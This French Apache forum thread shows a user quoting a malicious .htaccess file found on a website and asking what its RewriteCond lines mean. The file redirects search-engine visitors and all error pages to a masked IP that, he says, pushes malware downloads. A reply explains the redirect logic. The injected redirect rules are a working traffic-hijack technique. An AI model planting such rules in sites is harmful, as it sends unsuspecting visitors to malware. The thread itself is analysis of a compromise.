IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Apache Discussion :

Précisions sur RewriteCond


Sujet :

Apache

  1. #1
    Membre émérite Avatar de Djakisback
    Profil pro
    Inscrit en
    Février 2005
    Messages
    2 022
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Février 2005
    Messages : 2 022
    Points : 2 273
    Points
    2 273
    Par défaut Précisions sur RewriteCond
    Salut,
    je viens de trouver un beau fichier .htaccess sur un site :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    #  HostRule
    RewriteEngine On
    #  /HostRule
    ErrorDocument 400 <a href="http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710" target="_blank">http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710</a>
    ErrorDocument 401 <a href="http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710" target="_blank">http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710</a>
    ErrorDocument 403 <a href="http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710" target="_blank">http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710</a>
    ErrorDocument 404 <a href="http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710" target="_blank">http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710</a>
    ErrorDocument 500 <a href="http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710" target="_blank">http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710</a>
    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    RewriteCond %{HTTP_REFERER} .*bing.* [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.*
    RewriteRule ^(.*)$ <a href="http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710" target="_blank">http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710</a> [R=301,L]
    Je masque l'ip mais il s'agit d'un site forçant le dl de fichiers malveillants.
    Quelq'un pourrait-il m'expliquer ce que signifie les RewriteCond ?
    Est-ce qu'il s'agit de ne pas effectuer la réécriture si le referer est un de ceux cités ?
    J'ai aussi un peu de mal à comprendre cette ligne :

    RewriteRule ^(.*)$ http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710 [R=301,L]

    Merci d'avance.
    Vive les roues en pierre

  2. #2
    Rédacteur
    Avatar de _Mac_
    Profil pro
    Inscrit en
    Août 2005
    Messages
    9 601
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Août 2005
    Messages : 9 601
    Points : 12 977
    Points
    12 977
    Par défaut
    Citation Envoyé par Djakisback Voir le message
    Est-ce qu'il s'agit de ne pas effectuer la réécriture si le referer est un de ceux cités ?
    C'est l'inverse : si le referrer est l'un de ces sites, on redirige sur http://XX.XXX.XXX.XX/hitin.php?land=20&affid=63710

    Du détail, du détail, du détail !!!
    Revenons à la source : lisons la documentation et les fichiers de trace, la réponse à notre problème s'y trouve sans doute

  3. #3
    Membre émérite Avatar de Djakisback
    Profil pro
    Inscrit en
    Février 2005
    Messages
    2 022
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Février 2005
    Messages : 2 022
    Points : 2 273
    Points
    2 273
    Par défaut
    Ah ok, je te remercie
    Vive les roues en pierre

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Réponses: 5
    Dernier message: 24/05/2013, 21h15
  2. Précision sur Oracle 9iAS r2
    Par Patmane dans le forum Oracle
    Réponses: 9
    Dernier message: 18/03/2007, 04h41
  3. Précisions sur Import/export
    Par electro dans le forum Import/Export
    Réponses: 9
    Dernier message: 15/10/2004, 13h34
  4. [Observateur] Précisions sur le design pattern Observer [UML]
    Par joquetino dans le forum Design Patterns
    Réponses: 2
    Dernier message: 07/10/2004, 22h35
  5. Précision sur les sauvegarde à chaud
    Par alxkid dans le forum Administration
    Réponses: 2
    Dernier message: 09/08/2004, 18h55

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo